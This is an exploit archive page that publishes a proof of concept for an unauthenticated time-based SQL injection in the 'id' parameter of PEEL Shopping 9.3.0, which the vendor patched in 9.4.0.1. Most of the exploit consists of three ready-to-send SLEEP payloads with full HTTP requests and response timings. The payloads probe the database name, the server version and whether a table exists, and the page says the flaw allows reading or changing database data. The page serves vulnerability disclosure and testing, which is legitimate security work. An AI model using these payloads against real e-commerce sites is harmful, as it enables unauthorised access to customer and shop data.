exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PEEL Shopping 9.3.0 SQL Injection

PEEL Shopping 9.3.0 SQL Injection
Posted Jul 17, 2021
Authored by faisalfs10x

PEEL Shopping version 9.3.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | bb075e29d3bbfafef1042c9720d8285f75488e0c4067d3cf5021548fc4c93b8f

PEEL Shopping 9.3.0 SQL Injection

Change Mirror Download
# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
# Date: 2021-07-10
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.peel.fr
# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
# Version: prior to 9.4.0
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/advisto/peel-shopping/issues/3


################
# Description #
################

# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.


#####################
# PoC of detection #
#####################

1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".

PoC #1) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
Request: The response duration = 418 bytes | 7,719 millis
========

GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.

PoC #2) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
Request: The response duration = 418 bytes | 5,112 millis
========

GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.

PoC #3) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
Request: The response duration = 418 bytes | 10,140 millis
========

GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

# For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3.
# The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1
# The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close